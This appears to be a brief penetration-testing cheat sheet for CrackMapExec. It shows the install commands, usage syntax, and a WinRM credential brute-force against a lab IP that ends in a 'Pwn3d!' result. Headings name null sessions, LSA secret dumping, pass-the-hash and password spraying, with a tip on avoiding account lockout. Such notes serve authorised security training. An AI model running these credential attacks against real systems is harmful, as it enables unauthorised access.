CrackMapExec

Install

sudo apt install snapd
sudo snap install crackmapexec

CrackMapExec Protocol-Specific Help

crackmapexec smb -h

CrackMapExec Usage

crackmapexec <proto> <target-IP> -u <user or userlist> -p <password or passwordlist>
crackmapexec winrm 10.129.42.197 -u user.list -p password.list
WINRM       10.129.42.197   5985   NONE             [*] None (name:10.129.42.197) (domain:None)
WINRM       10.129.42.197   5985   NONE             [*] http://10.129.42.197:5985/wsman
WINRM       10.129.42.197   5985   NONE             [+] None\user:password (Pwn3d!)

Supported Protocols

SMB

Null Authentication

Anonymous Authentication

  • Put any value in the user field.

Login with username and password

Remote Dumping & LSA Secrets Considerations

Pass the Hash with CrackMapExec

CrackMapExec - Command Execution

winrm

Others

Enumerating the Password Policy - from Linux - Credentialed

SMB NULL Session to Pull User List

Password Spraying Active Directory

Local Admin Spraying with CrackMapExec

  • The --local-auth flag tells the tool to attempt a login only once on each machine, which removes the risk of account lockout.

    • Make sure this flag is set so we don't potentially lock out the domain's built-in administrator account.